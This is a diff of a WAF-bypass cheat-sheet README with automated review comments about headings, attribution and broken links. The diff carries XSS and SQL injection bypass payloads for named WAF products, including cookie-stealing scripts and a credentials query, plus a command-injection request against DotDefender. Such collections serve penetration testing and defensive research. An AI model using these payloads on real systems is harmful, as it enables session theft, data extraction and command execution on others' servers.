/ws/generic_api_call.pl?function=statns&standalone=%3c/script%3e%3cscript%3ealert(document.cookie)%3c/script%3e%3cscript%3e
|
||||||
|
```
|
||||||
|
|
||||||
|
### Cloudflare
|
||||||
- XSS Bypass by [@ArbazKiraak](https://twitter.com/ArbazKiraak)
|
- XSS Bypass by [@ArbazKiraak](https://twitter.com/ArbazKiraak)
|
||||||
```
|
```
|
||||||
<a href="j	a	v	asc
ri	pt:\u0061\u006C\u0065\u0072\u0074(this['document']['cookie'])">X</a>`
|
<a href="j	a	v	asc
ri	pt:\u0061\u006C\u0065\u0072\u0074(this['document']['cookie'])">X</a>`
|
||||||
```
|
```
|
||||||
|
|
||||||
### __Barracuda__
|
### Comodo
|
||||||
|
- SQLi by [@WAFNinja](https://waf.ninja)
|
||||||
|
```
|
||||||
|
0 union/**/select 1,version(),@@datadir
|
||||||
|
```
|
||||||
|
|
||||||
|
### Barracuda
|
||||||
- Cross Site Scripting by [@WAFNinja](https://waf.ninja)
|
- Cross Site Scripting by [@WAFNinja](https://waf.ninja)
|
||||||
```
|
```
|
||||||
<body style="height:1000px" onwheel="alert(1)">
|
<body style="height:1000px" onwheel="alert(1)">
|
||||||
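Review bot: the NetScaler HPP payload line `<string>’ union select current_user, 2#</string>` uses a typographic right quote (U+2019) where the original report would have an ASCII `'`, which makes the recorded payload inaccurate; replace it with a plain apostrophe. The Cloudflare block still ends with a stray backtick after `</a>` inside the fence. The vendor order is now Citrix, Cloudflare, Comodo, Barracuda; if the list is meant to be alphabetical, Barracuda belongs first, and the Citrix HPP bullet is missing the "by" before the author link that the other bullets use.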
@ -1725,36 +1792,6 @@ User-Agent: Mozilla/5.0 (compatible; MSIE5.01; Windows NT)
|
|||||||
- [Barracuda WAF 8.0.1 - Remote Command Execution (Metasploit)](https://www.exploit-db.com/exploits/40146) by [@xort](https://www.exploit-db.com/?author=479#)
|
- [Barracuda WAF 8.0.1 - Remote Command Execution (Metasploit)](https://www.exploit-db.com/exploits/40146) by [@xort](https://www.exploit-db.com/?author=479#)
|
||||||
- [Barracuda Spam & Virus Firewall 5.1.3 - Remote Command Execution (Metasploit)](https://www.exploit-db.com/exploits/40147) by [@xort](https://www.exploit-db.com/?author=479)
|
- [Barracuda Spam & Virus Firewall 5.1.3 - Remote Command Execution (Metasploit)](https://www.exploit-db.com/exploits/40147) by [@xort](https://www.exploit-db.com/?author=479)
|
||||||
|
|
||||||
### __Imperva SecureSphere__
|
|
||||||
- [Imperva SecureSphere 13 - Remote Command Execution](https://www.exploit-db.com/exploits/45542) by [@rsp3ar](https://www.exploit-db.com/?author=9396)
|
|
||||||
- XSS Bypass by [@Alra3ees](https://twitter.com/alra3ees)
|
|
||||||
```
|
|
||||||
anythinglr00</script><script>alert(document.domain)</script>uxldz
|
|
||||||
anythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxldz
|
|
||||||
```
|
|
||||||
- XSS Bypass by [@WAFNinja](https://waf.ninja)
|
|
||||||
```
|
|
||||||
%3Cimg%2Fsrc%3D%22x%22%2Fonerror%3D%22prom%5Cu0070t%2526%2523x28%3B%2526%2523x27%3B%2526%2523x58%3B%2526%2523x53%3B%2526%2523x53%3B%2526%2523x27%3B%2526%2523x29%3B%22%3E
|
|
||||||
```
|
|
||||||
- XSS Bypass by [@i_bo0om](https://twitter.com/i_bo0om)
|
|
||||||
```
|
|
||||||
<iframe/onload='this["src"]="javas	cript:al"+"ert``"';>
|
|
||||||
<img/src=q onerror='new Function`al\ert\`1\``'>
|
|
||||||
```
|
|
||||||
- XSS Bypass by [@c0d3g33k](https://twitter.com/c0d3g33k)
|
|
||||||
```
|
|
||||||
<object data='data:text/html;;;;;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=='></object>
|
|
||||||
```
|
|
||||||
- SQLi Bypass by [@DRK1WI](https://www.exploit-db.com/?author=7740)
|
|
||||||
```
|
|
||||||
15 and '1'=(SELECT '1' FROM dual) and '0having'='0having'
|
|
||||||
```
|
|
||||||
- SQLi by [@Giuseppe D'Amore](https://www.exploit-db.com/?author=6413)
|
|
||||||
```
|
|
||||||
stringindatasetchoosen%%' and 1 = any (select 1 from SECURE.CONF_SECURE_MEMBERS where FULL_NAME like '%%dministrator' and rownum<=1 and PASSWORD like '0%') and '1%%'='1
|
|
||||||
```
|
|
||||||
- [Imperva SecureSphere <= v13 - Privilege Escalation](https://www.exploit-db.com/exploits/45130) by [@0x09AL](https://www.exploit-db.com/?author=8991)
|
|
||||||
|
|
||||||
### __DotDefender__
|
### __DotDefender__
|
||||||
- Firewall disable by (v5.0) by [@hyp3rlinx](http://hyp3rlinx.altervista.org)
|
- Firewall disable by (v5.0) by [@hyp3rlinx](http://hyp3rlinx.altervista.org)
|
||||||
```
|
```
|
||||||
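Review bot: this hunk removes the whole Imperva SecureSphere block from between Barracuda and DotDefender and the last hunk re-adds it after DotDefender, but the re-added heading keeps the `### __Imperva SecureSphere__` bold style that this same commit strips from Cloudflare, Barracuda and Comodo, and `### __DotDefender__` here is left bold as well; apply the heading style change to all vendor headings in one go.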
@ -1765,8 +1802,7 @@ PGVuYWJsZWQ+ZmFsc2U8L2VuYWJsZWQ+
|
|||||||
```
|
```
|
||||||
POST /dotDefender/index.cgi HTTP/1.1
|
POST /dotDefender/index.cgi HTTP/1.1
Host: 172.16.159.132
Host: 172.16.159.132
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US;
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5
rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Encoding: gzip,deflate
@ -1778,8 +1814,7 @@ Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Type: application/x-www-form-urlencoded
Content-Length: 95
Content-Length: 95
sitename=dotdefeater&deletesitename=dotdefeater;id;ls -al
sitename=dotdefeater&deletesitename=dotdefeater;id;ls -al ../;pwd;&action=deletesite&linenum=15
../;pwd;&action=deletesite&linenum=15
```
```
- Persistent XSS (v4.0) by [@EnableSecurity](https://enablesecurity.com)
- Persistent XSS (v4.0) by [@EnableSecurity](https://enablesecurity.com)
```
```
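Review bot: joining the request body onto one line is correct and should stay: `sitename=dotdefeater&deletesitename=dotdefeater;id;ls -al ../;pwd;&action=deletesite&linenum=15` is exactly 95 bytes, which matches the unchanged `Content-Length: 95` header, whereas the previous break after `ls -al` made the body as shown longer than the header declares.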
@ -1896,40 +1931,60 @@ state=%2527+and+
BENCHMARK(40000000,ENCODE(%2527hello%2527,%2527batman%2527))+else+0+end)=0+--+
BENCHMARK(40000000,ENCODE(%2527hello%2527,%2527batman%2527))+else+0+end)=0+--+
```
```
### __Citrix NetScaler NS10.5__
### __Imperva SecureSphere__
- HTTP Parameter Pollution [@BGA Security](https://www.exploit-db.com/?author=7396)
- [Imperva SecureSphere 13 - Remote Command Execution](https://www.exploit-db.com/exploits/45542) by [@rsp3ar](https://www.exploit-db.com/?author=9396)
- XSS Bypass by [@Alra3ees](https://twitter.com/alra3ees)
```
```
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:tem="http://tempuri.org/">
anythinglr00</script><script>alert(document.domain)</script>uxldz
<soapenv:Header/>
anythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxldz
<soapenv:Body>
<string>’ union select current_user, 2#</string>
</soapenv:Body>
</soapenv:Envelope>
```
```
- XSS Bypass by [@WAFNinja](https://waf.ninja)
- `generic_api_call.pl` XSS by [@NNPoster](https://www.exploit-db.com/?author=6654)
```
```
/ws/generic_api_call.pl?function=statns&standalone=%3c/script%3e%3cscript%3ealert(document.cookie)%3c/script%3e%3cscript%3e
%3Cimg%2Fsrc%3D%22x%22%2Fonerror%3D%22prom%5Cu0070t%2526%2523x28%3B%2526%2523x27%3B%2526%2523x58%3B%2526%2523x53%3B%2526%2523x53%3B%2526%2523x27%3B%2526%2523x29%3B%22%3E
```
```
- XSS Bypass by [@i_bo0om](https://twitter.com/i_bo0om)
```
<iframe/onload='this["src"]="javas	cript:al"+"ert``"';>
<img/src=q onerror='new Function`al\ert\`1\``'>
```
- XSS Bypass by [@c0d3g33k](https://twitter.com/c0d3g33k)
```
<object data='data:text/html;;;;;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=='></object>
```
- SQLi Bypass by [@DRK1WI](https://www.exploit-db.com/?author=7740)
```
15 and '1'=(SELECT '1' FROM dual) and '0having'='0having'
```
- SQLi by [@Giuseppe D'Amore](https://www.exploit-db.com/?author=6413)
```
stringindatasetchoosen%%' and 1 = any (select 1 from SECURE.CONF_SECURE_MEMBERS where FULL_NAME like '%%dministrator' and rownum<=1 and PASSWORD like '0%') and '1%%'='1
```
- [Imperva SecureSphere <= v13 - Privilege Escalation](https://www.exploit-db.com/exploits/45130) by [@0x09AL](https://www.exploit-db.com/?author=8991)
### __WebKnight__
### __WebKnight__
- Cross Site Scripting by [@WAFNinja](https://waf.ninja/review-wafninja/)
- Cross Site Scripting by [@WAFNinja](https://waf.ninja/)
```
```
<isindex action=j	a	vas	c	r	ipt:alert(1) type=image>
<isindex action=j	a	vas	c	r	ipt:alert(1) type=image>
<marquee/onstart=confirm(2)>
<marquee/onstart=confirm(2)>
<details ontoggle=alert(1)>
<details ontoggle=alert(1)>
<div contextmenu="xss">Right-Click Here<menu id="xss" onshow="alert(1)">
<div contextmenu="xss">Right-Click Here<menu id="xss" onshow="alert(1)">
<img src=x onwheel=prompt(1)>
```
- SQLi by [@WAFNinja](https://waf.ninja)
```
0 union(select 1,username,password from(users))
0 union(select 1,@@hostname,@@datadir)
```
```
### __QuickDefense__
### __QuickDefense__
- Cross Site Scripting by [@WAFNinja](https://waf.ninja/review-wafninja/)
- Cross Site Scripting by [@WAFNinja](https://waf.ninja/)
```
```
?<input type="search" onsearch="aler\u0074(1)">
?<input type="search" onsearch="aler\u0074(1)">
<details ontoggle=alert(1)>
<details ontoggle=alert(1)>
```
```
### __Apache__
### __Apache__
- Writing method type in lowercase. [Source](https://github.com/Bo0oM/WAF-bypass-Cheat-Sheet))_
- Writing method type in lowercase by [@i_bo0om](http://twitter.com/i_bo0om)
```
```
get /login HTTP/1.1
get /login HTTP/1.1
Host: favoritewaf.com
Host: favoritewaf.com
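Review bot: the Citrix NetScaler NS10.5 section is lost in this hunk rather than reorganised: its heading is rewritten to `### __Imperva SecureSphere__`, and both of its entries (the HTTP Parameter Pollution SOAP request credited to @BGA Security and the `generic_api_call.pl` XSS credited to @NNPoster) are removed while the Imperva entries moved from the earlier hunk are added in their place. Unless those two entries are re-added elsewhere in this commit, keep the Citrix heading with its payloads and insert the Imperva section next to it. Separately, the Apache entry replaces `[Source](https://github.com/Bo0oM/WAF-bypass-Cheat-Sheet))_` with a Twitter handle; the stray `)_` did need fixing, but dropping the cheat-sheet link loses the reference to where the payload is documented, so keep both the handle and the repository link.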
@ -1937,7 +1992,7 @@ User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)
```
```
### __IIS__
### __IIS__
- Tabs before method _([Source](https://github.com/Bo0oM/WAF-bypass-Cheat-Sheet))_
- Tabs before method by [@i_bo0om](http://twitter.com/i_bo0om)
```
```
GET /login.php HTTP/1.1
GET /login.php HTTP/1.1
Host: favoritewaf.com
Host: favoritewaf.com
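Review bot: the IIS entry `- Tabs before method` now credits [@i_bo0om](http://twitter.com/i_bo0om) but drops the `[Source](https://github.com/Bo0oM/WAF-bypass-Cheat-Sheet)` link the old line carried, so readers can no longer reach the cheat sheet the request example is taken from; suggest `- Tabs before method by [@i_bo0om](http://twitter.com/i_bo0om) ([Source](https://github.com/Bo0oM/WAF-bypass-Cheat-Sheet))`.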
@ -2032,6 +2087,10 @@ X-Remote-Addr: 127.0.0.1
- [How To Reverse Engineer A Web Application Firewall Using Regular Expression Reversing](https://www.sunnyhoi.com/reverse-engineer-web-application-firewall-using-regular-expression-reversing/) - By [@SunnyHoi](https://sunnyhoi.com).
- [How To Reverse Engineer A Web Application Firewall Using Regular Expression Reversing](https://www.sunnyhoi.com/reverse-engineer-web-application-firewall-using-regular-expression-reversing/) - By [@SunnyHoi](https://sunnyhoi.com).
- [Bypassing Web-Application Firewalls by abusing SSL/TLS](https://0x09al.github.io/waf/bypass/ssl/2018/07/02/web-application-firewall-bypass.html) - By [@0x09AL](https://github.com/0x09al).
- [Bypassing Web-Application Firewalls by abusing SSL/TLS](https://0x09al.github.io/waf/bypass/ssl/2018/07/02/web-application-firewall-bypass.html) - By [@0x09AL](https://github.com/0x09al).
## Video Presentations
- [WAF Bypass Techniques Using HTTP Standard and Web Servers Behavior](https://www.youtube.com/watch?v=tSf_IXfuzXk) from [@OWASP](https://owasp.org).
- [Fingerprinting Filter Rules of Web Application Firewalls](https://www.usenix.org/conference/woot12/workshop-program/presentation/schmitt) from [@UseNix](https://www.usenix.com).
## Presentations & Research Papers
## Presentations & Research Papers
### Research Papers:
### Research Papers:
- [Protocol Level WAF Evasion](papers/Qualys%20Guide%20-%20Protocol-Level%20WAF%20Evasion.pdf) - A protocol level WAF evasion techniques and analysis by [Qualys](https://www.qualys.com).
- [Protocol Level WAF Evasion](papers/Qualys%20Guide%20-%20Protocol-Level%20WAF%20Evasion.pdf) - A protocol level WAF evasion techniques and analysis by [Qualys](https://www.qualys.com).
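Review bot: the new Video Presentations entry for "Fingerprinting Filter Rules of Web Application Firewalls" attributes it to `[@UseNix](https://www.usenix.com)` while the talk itself is linked on usenix.org; the organisation is USENIX and its site is https://www.usenix.org, so the attribution should read `[USENIX](https://www.usenix.org)` to avoid a dead or unrelated link.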
@ -2046,11 +2105,14 @@ X-Remote-Addr: 127.0.0.1
- [Beyond SQLi - Obfuscate and Bypass WAFs](papers/Beyond%20SQLi%20-%20Obfuscate%20and%20Bypass%20WAFs.txt) - A research paper from [Exploit Database](https://exploit-db.com) about obfuscating SQL injection queries to effectively bypass WAFs.
- [Beyond SQLi - Obfuscate and Bypass WAFs](papers/Beyond%20SQLi%20-%20Obfuscate%20and%20Bypass%20WAFs.txt) - A research paper from [Exploit Database](https://exploit-db.com) about obfuscating SQL injection queries to effectively bypass WAFs.
### Presentations:
### Presentations:
- [Methods to Bypass a Web Application Firewall](presentrations/Methods%20To%20Bypass%20A%20Web%20Application%20Firewall.pdf) - A presentation from [PT Security](https://www.ptsecurity.com) about bypassing WAF filters and evasion.
- [Web Application Firewall Bypassing (How to Defeat the Blue Team)](presentation/Web%20Application%20Firewall%20Bypassing%20(How%20to%20Defeat%20the%20Blue%20Team).pdf) - A presentation about bypassing WAF filtering and ruleset fuzzing for evasion by [@OWASP](https://owasp.org).
- [WAF Profiling & Evasion Techniques](presentations/OWASP%20WAF%20Profiling%20&%20Evasion.pdf) - A WAF testing and evasion guide from [OWASP](https://www.owasp.org).
- [WAF Profiling & Evasion Techniques](presentations/OWASP%20WAF%20Profiling%20&%20Evasion.pdf) - A WAF testing and evasion guide from [OWASP](https://www.owasp.org).
- [Protocol Level WAF Evasion Techniques](presentations/BlackHat%20US%2012%20-%20Protocol%20Level%20WAF%20Evasion%20(Slides).pdf) - A presentation at about efficiently evading WAFs at protocol level from [BlackHat US 12](https://www.blackhat.com/html/bh-us-12/).
- [Protocol Level WAF Evasion Techniques](presentations/BlackHat%20US%2012%20-%20Protocol%20Level%20WAF%20Evasion%20(Slides).pdf) - A presentation at about efficiently evading WAFs at protocol level from [BlackHat US 12](https://www.blackhat.com/html/bh-us-12/).
- [Analysing Attacking Detection Logic Mechanisms](presentations/BlackHat%20US%2016%20-%20Analysis%20of%20Attack%20Detection%20Logic.pdf) - A presentation about WAF logic applied to detecting attacks from [BlackHat US 16](https://www.blackhat.com/html/bh-us-16/).
- [Analysing Attacking Detection Logic Mechanisms](presentations/BlackHat%20US%2016%20-%20Analysis%20of%20Attack%20Detection%20Logic.pdf) - A presentation about WAF logic applied to detecting attacks from [BlackHat US 16](https://www.blackhat.com/html/bh-us-16/).
- [WAF Bypasses and PHP Exploits](presentations/WAF%20Bypasses%20and%20PHP%20Exploits%20(Slides).pdf) - A presentation about evading WAFs and developing related PHP exploits.
- [WAF Bypasses and PHP Exploits](presentations/WAF%20Bypasses%20and%20PHP%20Exploits%20(Slides).pdf) - A presentation about evading WAFs and developing related PHP exploits.
- [Our Favorite XSS Filters/IDS and how to Attack Them](presentations/Our%20Favourite%20XSS%20WAF%20Filters%20And%20How%20To%20Bypass%20Them.pdf) - A presentation about how to evade XSS filters set by WAF rules from [BlackHat USA 09](https://www.blackhat.com/html/bh-us-09/)
- [Playing Around with WAFs](presentations/Playing%20Around%20with%20WAFs.pdf) - A small presentation about WAF profiling and playing around with them from [Defcon 16](http://www.defcon.org/html/defcon-16/dc-16-post.html).
- [Playing Around with WAFs](presentations/Playing%20Around%20with%20WAFs.pdf) - A small presentation about WAF profiling and playing around with them from [Defcon 16](http://www.defcon.org/html/defcon-16/dc-16-post.html).
<!--stackedit_data:
eyJoaXN0b3J5IjpbMTgwNDI2NTY1OF19
## Credits & License:
-->
This work has been presented by [Infected Drake](https://twitter.com/0xInfection) and is licensed under the [Apache 2.0 License](LICENSE).
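Review bot: two of the newly added presentation links use relative paths that do not match the `presentations/` directory every other entry in this list points at: `presentrations/Methods%20To%20Bypass%20A%20Web%20Application%20Firewall.pdf` (typo) and `presentation/Web%20Application%20Firewall%20Bypassing%20(How%20to%20Defeat%20the%20Blue%20Team).pdf` (singular). Both will 404 in the rendered README; change both prefixes to `presentations/`. The unchanged context line "A presentation at about efficiently evading WAFs at protocol level" also carries a stray "at" that could be fixed in the same commit.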